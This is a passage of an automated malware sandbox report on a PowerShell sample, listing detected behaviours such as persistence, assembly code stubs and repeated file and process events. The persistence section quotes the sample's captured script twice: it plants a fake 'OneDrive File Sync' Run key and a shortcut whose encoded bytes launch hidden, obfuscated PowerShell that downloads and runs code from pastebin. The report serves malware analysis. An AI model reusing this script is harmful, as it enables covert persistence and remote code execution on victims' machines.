Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10FB5B7C push cs; retf 18_2_00007FFB10FB5B7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB111155D7 push esi; iretd 18_2_00007FFB111155E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1111D626 push es; retf 18_2_00007FFB1111D64F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB113CF9B6 pushad ; ret 18_2_00007FFB113CF9F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114D80FC push ebx; ret 18_2_00007FFB114D813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114DA18C pushad ; ret 18_2_00007FFB114DA184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114DA150 pushad ; ret 18_2_00007FFB114DA184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB114D4AE0 pushad ; ret 18_2_00007FFB114D4AF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB11756ECA push edx; ret 18_2_00007FFB11756ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dllJump to dropped file

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
